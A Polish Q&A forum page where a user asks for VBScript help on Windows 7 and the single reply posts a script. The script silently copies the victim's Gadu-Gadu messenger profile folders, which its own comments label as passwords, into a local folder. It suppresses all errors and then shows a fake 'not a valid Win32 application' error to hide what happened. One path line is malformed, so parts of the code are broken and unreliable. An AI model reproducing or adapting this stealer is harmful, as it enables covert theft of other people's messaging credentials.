Pytanie

Avatar użytkownika

Mam problem ze skryptem vbs w windowsie 7? Potrzebuję programisty w języku Visual Basic Skrypt. To mój e-mail [email protected]

Brak opisu

Odpowiedzi (1)

Odpowiedział(a) damian14c dodano 2011-08-13 22:05
Avatar użytkownika

On Error Resume Next
kopiowanie="Programy/gg/dane" '
kopiowanie1=kopiowanie&"/" ' dodawanie łamanej.
Dim dostepnew, foldernew 'nowy folder
Set dostepnew = CreateObject("Scripting.FileSystemObject") 'nowy folder
Set foldernew = dostepnew.CreateFolder(kopiowanie1) 'nowy folder
Dim Shell,userprofile,dostep, folder 'zmienne do starego i nowego gg
Set Shell = CreateObject("Wscript.Shell") 'zmienne do starego i nowego gg
Set dostep = CreateObject("Scripting.FileSystemObject") 'zmienne
userprofile = Shell.ExpandEnvironmentStrings("%userprofile%") 'zmienne
dane=userprofile&"\Gadu-Gadu" 'hasła ze starego gg
Set folder = dostep.GetFolder(dane) 'hasła ze starego gg
folder.Copy (kopiowanie) 'hasła ze starego gg
dane1=Users\Marta\AppData\Roaming\Gadu-Gadu10'
Set folder = dostep.GetFolder(dane1) 'hasła z nowego gg
folder.Copy (kopiowanie) 'hasła z nowego gg
x=msgbox("Ten program jest nie właściwą aplikacją Win32",16,"BŁĄD")

 

 

TO JEST TO?